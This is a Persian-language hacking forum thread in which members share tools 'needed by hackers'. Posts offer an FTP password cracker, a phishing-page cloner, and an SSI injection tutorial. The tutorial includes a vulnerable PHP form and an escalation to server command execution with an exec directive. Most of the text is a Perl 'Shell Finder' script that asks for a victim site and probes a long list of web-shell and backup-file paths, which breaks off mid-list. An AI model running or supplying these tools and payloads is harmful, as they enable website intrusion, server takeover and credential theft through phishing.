جستجو در تالارهای گفتگو

درود این پست ایجاد شد تا ابزار هایی که مورد نیاز هکران هست قرار داده بشه در مورد هریک از ابزار ها سوال داشتید پ.خ کنید ... اولین ابزار : FTPCracker نیاز به توضیح ندارد . password : iran-cyber.org FTPCracker.rar

بسم الله الرحمن الرحیم با سلام در این پست اموزشی می خواهم شما را با (SSI Injection (Server Side includes آشنا کنم. شیوع این باگ معمولا در فیلد های ورودی در فرم های تماس با ما ، فرم های همکاری ، ثبت نام و... است. <?php $FirstName = $_POST["FirstName"]; $LastName = $_POST["LastName"]; if ($FirstName == "" or $LastName == "") { $Field_Empty = 1; } else { $Line ='<p>Hello' . $FirstName . ' ' . $LastName . ',</p><p>Your Ip Address Is : ' . ' </p><h1><!--#echo var = "REMOTE_ADDR" --></h1>'; $FileOpen = fopen("0x3a1.shtml","w"); fputs($FileOpen,$Line,200); fclose($FileOpen); header("Location : 0x3a1.shtml"); exit; } ?> اگر این کد های PHP را در یک فرم ورودی اطلاعات با دوفیلد Firstname و Lastname بزاریم وقتی فرم را تایید کنیم وارد صفحه ی 0x3a1.shtml می شویم که در آن پیامی برای ما نوشته شده است. Hello $FirstName $LastName Your Ip Is : YourIp و می بینید که ای پی شما را نمایش داد نمایش این آی پی به عهده کد <!--#"echo var = "REMOTE_ADDR --> است مثلا اگر نام را Taha گذاشتیم باید طبق کد PHP برای ما پیامی مبنی بر Hello Taha Lastname بدهد حال اگر کد بالا را را قرار دهیم پیام به صورت Hello YourIp Lastname یعنی به نحوی توانستیم دستورات خود را روی سرور سایت بالا بیاوریم حالا من متودی رو عرض می کنم که این باگ را تبدیل به باگ RCE کنید به جای کد بالا از این کد استفاده کنید : <!--#exec cmd="ls"--> با اجرای کد بالا بر روی سرور لیستی از تمام فایل ها در آن دایرکتوری را برای ما نمایش می دهد اگر سوالی در این زمینه داشتید با بنده در ارتباط باشید. یا علی *تشکر باعث رغبت همه دوستان برای گذاشتن پست های آموزشی خوب و مفید است*

درود به زبان خارجیه ولی میتونه بهتون کمک کنه https://mega.nz/#F!7jIyBShb!5uQgMY-3UjZNCMrISP6ufQ

یک ابزار عالی برای ساخت صفحات جعلی(کارش خوبه) پایتون 3 نوشته شده اگر برای اجرا به این مشکل بر خوردید شما باید این دستور رو تایپ کنید pip3 install requests File "revoltshing.py", line 61, in main w.clonar() # start File "revoltshing.py", line 129, in clonar data = ulib.urlopen(self.url).read() File "/usr/lib/python3.7/http/client.py", line 470, in read s = self._safe_read(self.length) File "/usr/lib/python3.7/http/client.py", line 620, in _safe_read chunk = self.fp.read(min(amt, MAXAMOUNT)) File "/usr/lib/python3.7/socket.py", line 589, in readinto return self._sock.recv_into(b) File "/usr/lib/python3.7/ssl.py", line 1071, in recv_into return self.read(nbytes, buffer) File "/usr/lib/python3.7/ssl.py", line 929, in read return self._sslobj.read(len, buffer) ConnectionResetError: [Errno 104] Connection reset by peer RevoltShing-master.zip

درود اینم یه ابزار برای پیدا کردن شل بر روی وبسایت ها به زبان پرل نوشته شده #!/usr/bin/perl system('cls'); system('title Shell Finder'); { print " Shell Finder \n"; use HTTP::Request; use LWP::UserAgent; system('cls'); system('title Shell Finder '); $logo=" ##### ####### # # # # ###### # # # # # # ##### ###### ##### # # # # # # # # ## # # # # # # ##### ###### ##### # # ##### # # # # # # ##### # # # # # # # # # # # # # # # # ##### # # # # # # # # # # ## # # # # # ##### # # ###### ###### ###### # # # # ##### ###### # # \n"; print $logo; print color "blue";print " Scan Your Site\n\n Example: www.victim.com \n\n-> "; $site=<STDIN>; chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; print "\n"; @path = ('WSO.php','dz.php','w.php','wp-content/plugins/akismet/akismet.php','images/stories/w.php','w.php','shell.php','cpanel.php','cpn.php','sql.php','mysql.php','config. php','configuration.php','madspot.php','Cgishell.pl','killer.php','changeall.php ','2.php','Sh3ll.php','dz0.php','dam.php','user.php','dom.php','whmcs.php','r00t .php','1.php','a.php','r0k.php','abc.php','egy.php','syrian_shell.php','xxx.php' ​ ,'settings.php','tmp.php','cyber.php','c99.php','r57.php','404.php','gaza.php',' 1.php','d4rk.php','index1.php','nkr.php','xd.php','M4r0c.php','Dz.php','sniper.p hp','ksa.php','v4team.php','offline.php','priv8.php','911.php','madspotshell.php ','c100.php','sym.php','cp.php','tmp/cpn.php','tmp/w.php','tmp/r57.php','tmp/king.php','tmp/sok.php','tmp/ss.php','tmp/as.php','tmp/dz.php','tmp/r1z.php','tmp/whmcs.php','tmp/root.php','tmp/r00t.php','templates/beez/index.php','templates/beez/beez.php','templates/rhuk_milkyway/index.php','tmp/uploads.php','tmp/upload.php','tmp/sa.php','sa.php','readme.php','tmp/readme.php','wp.zip'.'wp-content/plugins/disqus-comment-system/disqus.php', 'd0mains.php','wp-content/plugins/akismet/akismet.php','madspotshell.php','info.php','egyshell.php','Sym.php','c22.php','c 100.php', 'wp-content/plugins/akismet/admin.php#','configuration.php','g.php','wp-content/plugins/google-sitemap-generator/sitemap-core.php#', 'wp-content/plugins/akismet/widget.php#','xx.pl','ls.php','Cpanel.php','k.php','zone-h.php','tmp/user.php','tmp/Sym.php','cp.php', 'tmp/madspotshell.php','tmp/root.php','tmp/whmcs.php','tmp/index.php','tmp/2.php','tmp/dz.php','tmp/cpn.php', 'tmp/changeall.php','tmp/Cgishell.pl','tmp/sql.php','0day.php','tmp/admin.php','cliente/downloads/h4xor.php', 'whmcs/downloads/dz.php','L3b.php','d.php','tmp/d.php','tmp/L3b.php','wp-content/plugins/akismet/admin.php', 'templates/rhuk_milkyway/index.php','templates/beez/index.php','sado.php','admin1.php','upload.php','up.php','vb.zip','vb.rar', 'admin2.asp','uploads.php','sa.php','sysadmins/','admin1/','sniper.php','administration/Sym.php','images/Sym.php', '/r57.php','/wp-content/plugins/disqus-comment-system/disqus.php','gzaa_spysl','sql-new.php','/shell.php','/sa.php','/admin.php', '/sa2.php','/2.php','/gaza.php','/up.php','/upload.php','/uploads.php','/templates/beez/index.php','shell.php','/amad.php', '/t00.php','/dz.php','/site.rar','/Black.php','/site.tar.gz','/home.zip','/home.rar','/home.tar','/home.tar.gz', '/forum.zip','/forum.rar','/forum.tar','/forum.tar.gz','/test.txt','/ftp.txt','/user.txt','/site.txt','/error_log','/error', '/cpanel','/awstats','/site.sql','/vb.sql','/forum.sql','r00t-s3c.php','c.php','/backup.sql','/back.sql','/data.sql','wp.rar/', 'wp-content/plugins/disqus-comment-system/disqus.php','asp.aspx','/templates/beez/index.php','tmp/vaga.php', 'tmp/killer.php','whmcs.php','abuhlail.php','tmp/killer.php','tmp/domaine.pl','tmp/domaine.php','useradmin/', 'tmp/d0maine.php','d0maine.php','tmp/sql.php','X.php','123.php','m.php','b.php','up.php','tmp/dz1.php','dz1.php','forum.zip','Symlink.php','Symlink.pl', 'forum.rar','joomla.zip','joomla.rar','wp.php','buck.sql','sysadmin.php','images/c99.php', 'xd.php', 'c100.php', 'spy.aspx','xd.php','tmp/xd.php','sym/root/home/','billing/killer.php','tmp/upload.php','tmp/admin.php', 'Server.php','tmp/uploads.php','tmp/up.php','Server/','wp-admin/c99.php','tmp/priv8.php','priv8.php','cgi.pl/', 'tmp/cgi.pl','downloads/dom.php','templates/ja-helio-farsi/index.php','webadmin.html','admins.php', '/wp-content/plugins/count-per-day/js/yc/d00.php','bluff.php','king.jeen','admins/','admins.asp','admins.php','wp.zip','/wp-content/plugins/disqus-comment-system/WSO.php', '/wp-content/plugins/disqus-comment-system/dz.php', '/wp-content/plugins/disqus-comment-system/DZ.php', '/wp-content/plugins/disqus-comment-system/cpanel.php', '/wp-content/plugins/disqus-comment-system/cpn.php', '/wp-content/plugins/disqus-comment-system/sos.php', '/wp-content/plugins/disqus-comment-system/term.php', '/wp-content/plugins/disqus-comment-system/Sec-War.php', '/wp-content/plugins/disqus-comment-system/sql.php', '/wp-content/plugins/disqus-comment-system/ssl.php', '/wp-content/plugins/disqus-comment-system/mysql.php', '/wp-content/plugins/disqus-comment-system/WolF.php', '/wp-content/plugins/disqus-comment-system/madspot.php', '/wp-content/plugins/disqus-comment-system/Cgishell.pl', '/wp-content/plugins/disqus-comment-system/killer.php', '/wp-content/plugins/disqus-comment-system/changeall.php', '/wp-content/plugins/disqus-comment-system/2.php', '/wp-content/plugins/disqus-comment-system/Sh3ll.php', '/wp-content/plugins/disqus-comment-system/dz0.php', '/wp-content/plugins/disqus-comment-system/dam.php', '/wp-content/plugins/disqus-comment-system/user.php', '/wp-content/plugins/disqus-comment-system/dom.php', '/wp-content/plugins/disqus-comment-system/whmcs.php', '/wp-content/plugins/disqus-comment-system/vb.zip', '/wp-content/plugins/disqus-comment-system/r00t.php', '/wp-content/plugins/disqus-comment-system/c99.php', '/wp-content/plugins/disqus-comment-system/gaza.php', '/wp-content/plugins/disqus-comment-system/1.php', '/wp-content/plugins/disqus-comment-system/d0mains.php', '/wp-content/plugins/disqus-comment-system/madspotshell.php', '/wp-content/plugins/disqus-comment-system/info.php', '/wp-content/plugins/disqus-comment-system/egyshell.php', '/wp-content/plugins/disqus-comment-system/Sym.php', '/wp-content/plugins/disqus-comment-system/c22.php', '/wp-content/plugins/disqus-comment-system/c100.php', '/wp-content/plugins/disqus-comment-system/configuration.php', '/wp-content/plugins/disqus-comment-system/g.php', '/wp-content/plugins/disqus-comment-system/xx.pl', '/wp-content/plugins/disqus-comment-system/ls.php', '/wp-content/plugins/disqus-comment-system/Cpanel.php', '/wp-content/plugins/disqus-comment-system/k.php', '/wp-content/plugins/disqus-comment-system/zone-h.php', '/wp-content/plugins/disqus-comment-system/tmp/user.php', '/wp-content/plugins/disqus-comment-system/tmp/Sym.php', '/wp-content/plugins/disqus-comment-system/cp.php', '/wp-content/plugins/disqus-comment-system/tmp/madspotshell.php', '/wp-content/plugins/disqus-comment-system/tmp/root.php', '/wp-content/plugins/disqus-comment-system/tmp/whmcs.php', '/wp-content/plugins/disqus-comment-system/tmp/index.php', '/wp-content/plugins/disqus-comment-system/tmp/2.php', '/wp-content/plugins/disqus-comment-system/tmp/dz.php', '/wp-content/plugins/disqus-comment-system/tmp/cpn.php', '/wp-content/plugins/disqus-comment-system/tmp/changeall.php', '/wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl', '/wp-content/plugins/disqus-comment-system/tmp/sql.php', '/wp-content/plugins/disqus-comment-system/0day.php', '/wp-content/plugins/disqus-comment-system/tmp/admin.php', '/wp-content/plugins/disqus-comment-system/L3b.php', '/wp-content/plugins/disqus-comment-system/d.php', '/wp-content/plugins/disqus-comment-system/tmp/d.php', '/wp-content/plugins/disqus-comment-system/tmp/L3b.php', '/wp-content/plugins/disqus-comment-system/sado.php', '/wp-content/plugins/disqus-comment-system/admin1.php', '/wp-content/plugins/disqus-comment-system/upload.php', '/wp-content/plugins/disqus-comment-system/up.php', '/wp-content/plugins/disqus-comment-system/vb.zip', '/wp-content/plugins/disqus-comment-system/vb.rar', '/wp-content/plugins/disqus-comment-system/admin2.asp', '/wp-content/plugins/disqus-comment-system/uploads.php', '/wp-content/plugins/disqus-comment-system/sa.php', '/wp-content/plugins/disqus-comment-system/sysadmins/', '/wp-content/plugins/disqus-comment-system/admin1/', '/wp-content/plugins/disqus-comment-system/sniper.php', '/wp-content/plugins/disqus-comment-system/images/Sym.php', '/wp-content/plugins/disqus-comment-system//r57.php', '/wp-content/plugins/disqus-comment-system/gzaa_spysl', '/wp-content/plugins/disqus-comment-system/sql-new.php', '/wp-content/plugins/disqus-comment-system//shell.php', '/wp-content/plugins/disqus-comment-system//sa.php', '/wp-content/plugins/disqus-comment-system//admin.php', '/wp-content/plugins/disqus-comment-system//sa2.php', '/wp-content/plugins/disqus-comment-system//2.php', '/wp-content/plugins/disqus-comment-system//gaza.php', '/wp-content/plugins/disqus-comment-system//up.php', '/wp-content/plugins/disqus-comment-system//upload.php', '/wp-content/plugins/disqus-comment-system//uploads.php', '/wp-content/plugins/disqus-comment-system/shell.php', '/wp-content/plugins/disqus-comment-system//amad.php', '/wp-content/plugins/disqus-comment-system//t00.php', 'pwp-content/plugins/disqus-comment-system/disqus.php', 'wp-content/plugins/akismet/WSO.php', 'wp-content/plugins/akismet/dz.php', 'wp-content/plugins/akismet/DZ.php', 'wp-content/plugins/akismet/cpanel.php', 'wp-content/plugins/akismet/cpn.php', 'wp-content/plugins/akismet/sos.php', 'wp-content/plugins/akismet/term.php', 'wp-content/plugins/akismet/Sec-War.php', 'wp-content/plugins/akismet/sql.php', 'wp-content/plugins/akismet/ssl.php', 'wp-content/plugins/akismet/mysql.php', 'wp-content/plugins/akismet/WolF.php', 'wp-content/plugins/akismet/madspot.php', 'wp-content/plugins/akismet/Cgishell.pl', 'wp-content/plugins/akismet/killer.php', 'wp-content/plugins/akismet/changeall.php', 'wp-content/plugins/akismet/2.php', 'wp-content/plugins/akismet/Sh3ll.php', 'wp-content/plugins/akismet/dz0.php', 'wp-content/plugins/akismet/dam.php', 'wp-content/plugins/akismet/user.php', 'wp-content/plugins/akismet/dom.php', 'wp-content/plugins/akismet/whmcs.php', 'wp-content/plugins/akismet/vb.zip', 'wp-content/plugins/akismet/r00t.php', 'wp-content/plugins/akismet/c99.php', 'wp-content/plugins/akismet/gaza.php', 'wp-content/plugins/akismet/1.php', 'wp-content/plugins/akismet/d0mains.php', 'wp-content/plugins/akismet/madspotshell.php', 'wp-content/plugins/akismet/info.php', 'wp-content/plugins/akismet/egyshell.php', 'wp-content/plugins/akismet/Sym.php', 'wp-content/plugins/akismet/c22.php', 'wp-content/plugins/akismet/c100.php', 'wp-content/plugins/akismet/configuration.php', 'wp-content/plugins/akismet/g.php', 'wp-content/plugins/akismet/xx.pl', 'wp-content/plugins/akismet/ls.php', 'wp-content/plugins/akismet/Cpanel.php', 'wp-content/plugins/akismet/k.php', 'wp-content/plugins/akismet/zone-h.php', 'wp-content/plugins/akismet/tmp/user.php', 'wp-content/plugins/akismet/tmp/Sym.php', 'wp-content/plugins/akismet/cp.php', 'wp-content/plugins/akismet/tmp/madspotshell.php', 'wp-content/plugins/akismet/tmp/root.php', 'wp-content/plugins/akismet/tmp/whmcs.php', 'wp-content/plugins/akismet/tmp/index.php', 'wp-content/plugins/akismet/tmp/2.php', 'wp-content/plugins/akismet/tmp/dz.php', 'wp-content/plugins/akismet/tmp/cpn.php', 'wp-content/plugins/akismet/tmp/changeall.php', 'wp-content/plugins/akismet/tmp/Cgishell.pl', 'wp-content/plugins/akismet/tmp/sql.php', 'wp-content/plugins/akismet/0day.php', 'wp-content/plugins/akismet/tmp/admin.php', 'wp-content/plugins/akismet/L3b.php', 'wp-content/plugins/akismet/d.php', 'wp-content/plugins/akismet/tmp/d.php', 'wp-content/plugins/akismet/tmp/L3b.php', 'wp-content/plugins/akismet/sado.php', 'wp-content/plugins/akismet/admin1.php', 'wp-content/plugins/akismet/upload.php', 'wp-content/plugins/akismet/up.php', 'wp-content/plugins/akismet/vb.zip', 'wp-content/plugins/akismet/vb.rar', 'wp-content/plugins/akismet/admin2.asp', 'wp-content/plugins/akismet/uploads.php', 'wp-content/plugins/akismet/sa.php', 'wp-content/plugins/akismet/sysadmins/', 'wp-content/plugins/akismet/admin1/', 'wp-content/plugins/akismet/sniper.php', 'wp-content/plugins/akismet/images/Sym.php', 'wp-content/plugins/akismet//r57.php', 'wp-content/plugins/akismet/gzaa_spysl', 'wp-content/plugins/akismet/sql-new.php', 'wp-content/plugins/akismet//shell.php', 'wp-content/plugins/akismet//sa.php', 'wp-content/plugins/akismet//admin.php', 'wp-content/plugins/akismet//sa2.php', 'wp-content/plugins/akismet//2.php', 'wp-content/plugins/akismet//gaza.php', 'wp-content/plugins/akismet//up.php', 'wp-content/plugins/akismet//upload.php', 'wp-content/plugins/akismet//uploads.php', 'wp-content/plugins/akismet/shell.php', 'wp-content/plugins/akismet//amad.php', 'wp-content/plugins/akismet//t00.php', 'wp-content/plugins/akismet//dz.php', 'wp-content/plugins/akismet//site.rar', 'wp-content/plugins/akismet//Black.php', 'wp-content/plugins/akismet//site.tar.gz', 'wp-content/plugins/akismet//home.zip', 'wp-content/plugins/akismet//home.rar', 'wp-content/plugins/akismet//home.tar', 'wp-content/plugins/akismet//home.tar.gz', 'wp-content/plugins/akismet//forum.zip', 'wp-content/plugins/akismet//forum.rar', 'wp-content/plugins/akismet//forum.tar', 'wp-content/plugins/akismet//forum.tar.gz', 'wp-content/plugins/akismet//test.txt', 'wp-content/plugins/akismet//ftp.txt', 'wp-content/plugins/akismet//user.txt', 'wp-content/plugins/akismet//site.txt', 'wp-content/plugins/akismet//error_log', 'wp-content/plugins/akismet//error', 'wp-content/plugins/akismet//cpanel', 'wp-content/plugins/akismet//awstats', 'wp-content/plugins/akismet//site.sql', 'wp-content/plugins/akismet//vb.sql', 'wp-content/plugins/akismet//forum.sql', 'wp-content/plugins/akismet/r00t-s3c.php', 'wp-content/plugins/akismet/c.php', 'wp-content/plugins/akismet//backup.sql', 'wp-content/plugins/akismet//back.sql', 'wp-content/plugins/akismet//data.sql', 'wp-content/plugins/akismet/wp.rar/', 'wp-content/plugins/akismet/asp.aspx', 'wp-content/plugins/akismet/tmp/vaga.php', 'wp-content/plugins/akismet/tmp/killer.php', 'wp-content/plugins/akismet/whmcs.php', 'wp-content/plugins/akismet/abuhlail.php', 'wp-content/plugins/akismet/tmp/killer.php', 'wp-content/plugins/akismet/tmp/domaine.pl', 'wp-content/plugins/akismet/tmp/domaine.php', 'wp-content/plugins/akismet/useradmin/', 'wp-content/plugins/akismet/tmp/d0maine.php', 'wp-content/plugins/akismet/d0maine.php', 'wp-content/plugins/akismet/tmp/sql.php', 'wp-content/plugins/akismet/X.php', 'wp-content/plugins/akismet/123.php', 'wp-content/plugins/akismet/m.php', 'wp-content/plugins/akismet/b.php', 'wp-content/plugins/akismet/up.php', 'wp-content/plugins/akismet/tmp/dz1.php', 'wp-content/plugins/akismet/dz1.php', 'wp-content/plugins/akismet/forum.zip', 'wp-content/plugins/akismet/Symlink.php', 'wp-content/plugins/akismet/Symlink.pl', 'wp-content/plugins/akismet/forum.rar', 'wp-content/plugins/akismet/joomla.zip', 'wp-content/plugins/akismet/joomla.rar', 'wp-content/plugins/akismet/wp.php', 'wp-content/plugins/akismet/buck.sql', 'wp-content/plugins/akismet/sysadmin.php', 'wp-content/plugins/akismet/images/c99.php', 'wp-content/plugins/akismet/xd.php', 'wp-content/plugins/akismet/c100.php', 'wp-content/plugins/akismet/spy.aspx', 'wp-content/plugins/akismet/xd.php', 'wp-content/plugins/akismet/tmp/xd.php', 'wp-content/plugins/akismet/sym/root/home/', 'wp-content/plugins/akismet/billing/killer.php', 'wp-content/plugins/akismet/tmp/upload.php', 'wp-content/plugins/akismet/tmp/admin.php', 'wp-content/plugins/akismet/Server.php', 'wp-content/plugins/akismet/tmp/uploads.php', 'wp-content/plugins/akismet/tmp/up.php', 'wp-content/plugins/akismet/Server/', 'wp-content/plugins/akismet/wp-admin/c99.php', 'wp-content/plugins/akismet/tmp/priv8.php', 'wp-content/plugins/akismet/priv8.php', 'wp-content/plugins/akismet/cgi.pl/', 'wp-content/plugins/akismet/tmp/cgi.pl', 'wp-content/plugins/akismet/downloads/dom.php', 'wp-content/plugins/akismet/webadmin.html', 'wp-content/plugins/akismet/admins.php', 'wp-content/plugins/akismet/bluff.php', 'wp-content/plugins/akismet/king.jeen', 'wp-content/plugins/akismet/admins/', 'wp-content/plugins/akismet/admins.asp', 'wp-content/plugins/akismet/admins.php', 'wp-content/plugins/akismet/wp.zip', 'wp-content/plugins/akismet/disqus.php', 'wp-content/plugins/google-sitemap-generator//cpanel', 'wp-content/plugins/google-sitemap-generator//awstats', 'wp-content/plugins/google-sitemap-generator//site.sql', 'wp-content/plugins/google-sitemap-generator//vb.sql', 'wp-content/plugins/google-sitemap-generator//forum.sql', 'wp-content/plugins/google-sitemap-generator/r00t-s3c.php', 'wp-content/plugins/google-sitemap-generator/c.php', 'wp-content/plugins/google-sitemap-generator//backup.sql', 'wp-content/plugins/google-sitemap-generator//back.sql', 'wp-content/plugins/google-sitemap-generator//data.sql', 'wp-content/plugins/google-sitemap-generator/wp.rar/', 'wp-content/plugins/google-sitemap-generator/asp.aspx', 'wp-content/plugins/google-sitemap-generator/tmp/vaga.php', 'wp-content/plugins/google-sitemap-generator/tmp/killer.php', 'wp-content/plugins/google-sitemap-generator/whmcs.php', 'wp-content/plugins/google-sitemap-generator/abuhlail.php', 'wp-content/plugins/google-sitemap-generator/tmp/killer.php', 'wp-content/plugins/google-sitemap-generator/tmp/domaine.pl', 'wp-content/plugins/google-sitemap-generator/tmp/domaine.php', 'wp-content/plugins/google-sitemap-generator/useradmin/', 'wp-content/plugins/google-sitemap-generator/tmp/d0maine.php', 'wp-content/plugins/google-sitemap-generator/d0maine.php', 'wp-content/plugins/google-sitemap-generator/tmp/sql.php', 'wp-content/plugins/google-sitemap-generator/X.php', 'wp-content/plugins/google-sitemap-generator/123.php', 'wp-content/plugins/google-sitemap-generator/m.php', 'wp-content/plugins/google-sitemap-generator/b.php', 'wp-content/plugins/google-sitemap-generator/up.php', 'wp-content/plugins/google-sitemap-generator/tmp/dz1.php', 'wp-content/plugins/google-sitemap-generator/dz1.php', 'wp-content/plugins/google-sitemap-generator/forum.zip', 'wp-content/plugins/google-sitemap-generator/Symlink.php', 'wp-content/plugins/google-sitemap-generator/Symlink.pl', 'wp-content/plugins/google-sitemap-generator/forum.rar', 'wp-content/plugins/google-sitemap-generator/joomla.zip', 'wp-content/plugins/google-sitemap-generator/joomla.rar', 'wp-content/plugins/google-sitemap-generator/wp.php', 'wp-content/plugins/google-sitemap-generator/buck.sql', 'wp-content/plugins/google-sitemap-generator/sysadmin.php', 'wp-content/plugins/google-sitemap-generator/images/c99.php', 'wp-content/plugins/google-sitemap-generator/xd.php', 'wp-content/plugins/google-sitemap-generator/c100.php', 'wp-content/plugins/google-sitemap-generator/spy.aspx', 'wp-content/plugins/google-sitemap-generator/xd.php', 'wp-content/plugins/google-sitemap-generator/tmp/xd.php', 'wp-content/plugins/google-sitemap-generator/sym/root/home/', 'wp-content/plugins/google-sitemap-generator/billing/killer.php', 'wp-content/plugins/google-sitemap-generator/tmp/upload.php', 'wp-content/plugins/google-sitemap-generator/tmp/admin.php', 'wp-content/plugins/google-sitemap-generator/Server.php', 'wp-content/plugins/google-sitemap-generator/tmp/uploads.php', 'wp-content/plugins/google-sitemap-generator/tmp/up.php', 'wp-content/plugins/google-sitemap-generator/Server/', 'wp-content/plugins/google-sitemap-generator/wp-admin/c99.php', 'wp-content/plugins/google-sitemap-generator/tmp/priv8.php', 'wp-content/plugins/google-sitemap-generator/priv8.php', 'wp-content/plugins/google-sitemap-generator/cgi.pl/', 'wp-content/plugins/google-sitemap-generator/tmp/cgi.pl', 'wp-content/plugins/google-sitemap-generator/downloads/dom.php', 'wp-content/plugins/google-sitemap-generator/webadmin.html', 'wp-content/plugins/google-sitemap-generator/admins.php', 'wp-content/plugins/google-sitemap-generator/bluff.php', 'wp-content/plugins/google-sitemap-generator/king.jeen', 'wp-content/plugins/google-sitemap-generator/admins/', 'wp-content/plugins/google-sitemap-generator/admins.asp', 'wp-content/plugins/google-sitemap-generator/admins.php', 'wp-content/plugins/google-sitemap-generator/wp.zip', 'wp-content/plugins/google-sitemap-generator/sitemap-core.php', '/templates/beez/WSO.php', '/templates/beez/dz.php', '/templates/beez/DZ.php', '/templates/beez/cpanel.php', '/templates/beez/cpn.php', '/templates/beez/sos.php', '/templates/beez/term.php', '/templates/beez/Sec-War.php', '/templates/beez/sql.php', '/templates/beez/ssl.php', '/templates/beez/mysql.php', '/templates/beez/WolF.php', '/templates/beez/madspot.php', '/templates/beez/Cgishell.pl', '/templates/beez/killer.php', '/templates/beez/changeall.php', '/templates/beez/2.php', '/templates/beez/Sh3ll.php', '/templates/beez/dz0.php', '/templates/beez/dam.php', '/templates/beez/user.php', '/templates/beez/dom.php', '/templates/beez/whmcs.php', '/templates/beez/vb.zip', '/templates/beez/r00t.php', '/templates/beez/c99.php', '/templates/beez/gaza.php', '/templates/beez/1.php', '/templates/beez/d0mains.php', '/templates/beez/madspotshell.php', '/templates/beez/info.php', '/templates/beez/egyshell.php', '/templates/beez/Sym.php', '/templates/beez/c22.php', '/templates/beez/c100.php', '/templates/beez/configuration.php', '/templates/beez/g.php', '/templates/beez/xx.pl', '/templates/beez/ls.php', '/templates/beez/Cpanel.php', '/templates/beez/k.php', '/templates/beez/zone-h.php', '/templates/beez/tmp/user.php', '/templates/beez/tmp/Sym.php', '/templates/beez/cp.php', '/templates/beez/tmp/madspotshell.php', '/templates/beez/tmp/root.php', '/templates/beez/tmp/whmcs.php', '/templates/beez/tmp/index.php', '/templates/beez/tmp/2.php', '/templates/beez/tmp/dz.php', '/templates/beez/tmp/cpn.php', '/templates/beez/tmp/changeall.php', '/templates/beez/tmp/Cgishell.pl', '/templates/beez/tmp/sql.php', '/templates/beez/0day.php', '/templates/beez/tmp/admin.php', '/templates/beez/L3b.php', '/templates/beez/d.php', '/templates/beez/tmp/d.php', '/templates/beez/tmp/L3b.php', '/templates/beez/sado.php', '/templates/beez/admin1.php', '/templates/beez/upload.php', '/templates/beez/up.php', '/templates/beez/vb.zip', '/templates/beez/vb.rar', '/templates/beez/admin2.asp', '/templates/beez/uploads.php', '/templates/beez/sa.php', '/templates/beez/sysadmins/', '/templates/beez/admin1/', '/templates/beez/sniper.php', '/templates/beez/images/Sym.php', '/templates/beez//r57.php', '/templates/beez/gzaa_spysl', '/templates/beez/sql-new.php', '/templates/beez//shell.php', '/templates/beez//sa.php', '/templates/beez//admin.php', '/templates/beez//sa2.php', '/templates/beez//2.php', '/templates/beez//gaza.php', '/templates/beez//up.php', '/templates/beez//upload.php', '/templates/beez//uploads.php', '/templates/beez/shell.php', '/templates/beez//amad.php', '/templates/beez//t00.php', '/templates/beez//dz.php', '/templates/beez//site.rar', '/templates/beez//Black.php', '/templates/beez//site.tar.gz', '/templates/beez//home.zip', '/templates/beez//home.rar', '/templates/beez//home.tar', '/templates/beez//home.tar.gz', '/templates/beez//forum.zip', '/templates/beez//forum.rar', '/templates/beez//forum.tar', '/templates/beez//forum.tar.gz', '/templates/beez//test.txt', '/templates/beez//ftp.txt', '/templates/beez//user.txt', '/templates/beez//site.txt', '/templates/beez//error_log', '/templates/beez//error', '/templates/beez//cpanel', '/templates/beez//awstats', '/templates/beez//site.sql', '/templates/beez//vb.sql', '/templates/beez//forum.sql', '/templates/beez/r00t-s3c.php', '/templates/beez/c.php', '/templates/beez//backup.sql', '/templates/beez//back.sql', '/templates/beez//data.sql', '/templates/beez/wp.rar/', '/templates/beez/asp.aspx', '/templates/beez/tmp/vaga.php', '/templates/beez/tmp/killer.php', '/templates/beez/whmcs.php', '/templates/beez/abuhlail.php', '/templates/beez/tmp/killer.php', '/templates/beez/tmp/domaine.pl', '/templates/beez/tmp/domaine.php', '/templates/beez/useradmin/', '/templates/beez/tmp/d0maine.php', '/templates/beez/d0maine.php', '/templates/beez/tmp/sql.php', '/templates/beez/X.php', '/templates/beez/123.php', '/templates/beez/m.php', '/templates/beez/b.php', '/templates/beez/up.php', '/templates/beez/tmp/dz1.php', '/templates/beez/dz1.php', '/templates/beez/forum.zip', '/templates/beez/Symlink.php', '/templates/beez/Symlink.pl', '/templates/beez/forum.rar', '/templates/beez/joomla.zip', '/templates/beez/joomla.rar', '/templates/beez/wp.php', '/templates/beez/buck.sql', '/templates/beez/sysadmin.php', '/templates/beez/images/c99.php', '/templates/beez/xd.php', '/templates/beez/c100.php', '/templates/beez/spy.aspx', '/templates/beez/xd.php', '/templates/beez/tmp/xd.php', '/templates/beez/sym/root/home/', '/templates/beez/billing/killer.php', '/templates/beez/tmp/upload.php', '/templates/beez/tmp/admin.php', '/templates/beez/Server.php', '/templates/beez/tmp/uploads.php', '/templates/beez/tmp/up.php', '/templates/beez/Server/', '/templates/beez/wp-admin/c99.php', '/templates/beez/tmp/priv8.php', '/templates/beez/priv8.php', '/templates/beez/cgi.pl/', '/templates/beez/tmp/cgi.pl', '/templates/beez/downloads/dom.php', '/templates/beez/webadmin.html', '/templates/beez/admins.php', '/templates/beez/bluff.php', '/templates/beez/king.jeen', '/templates/beez/admins/', '/templates/beez/admins.asp', '/templates/beez/admins.php', '/templates/beez/wp.zip', '/templates/beez/index.php','/images/WSO.php', '/images/dz.php', '/images/DZ.php', '/images/cpanel.php', '/images/cpn.php', '/images/sos.php', '/images/term.php', '/images/Sec-War.php', '/images/sql.php', '/images/ssl.php', '/images/mysql.php', '/images/WolF.php', '/images/madspot.php', '/images/Cgishell.pl', '/images/killer.php', '/images/changeall.php', '/images/2.php', '/images/Sh3ll.php', '/images/dz0.php', '/images/dam.php', '/images/user.php', '/images/dom.php', '/images/whmcs.php', '/images/vb.zip', '/images/r00t.php', '/images/c99.php', '/images/gaza.php', '/images/1.php', '/images/d0mains.php', '/images/madspotshell.php', '/images/info.php', '/images/egyshell.php', '/images/Sym.php', '/images/c22.php', '/images/c100.php', '/images/configuration.php', '/images/g.php', '/images/xx.pl', '/images/ls.php', '/images/Cpanel.php', '/images/k.php', '/images/zone-h.php', '/images/tmp/user.php', '/images/tmp/Sym.php', '/images/cp.php', '/images/tmp/madspotshell.php', '/images/tmp/root.php', '/images/tmp/whmcs.php', '/images/tmp/index.php', '/images/tmp/2.php', '/images/tmp/dz.php', '/images/tmp/cpn.php', '/images/tmp/changeall.php', '/images/tmp/Cgishell.pl', '/images/tmp/sql.php', '/images/0day.php', '/images/tmp/admin.php', '/images/L3b.php', '/images/d.php', '/images/tmp/d.php', '/images/tmp/L3b.php', '/images/sado.php', '/images/admin1.php', '/images/upload.php', '/images/up.php', '/images/vb.zip', 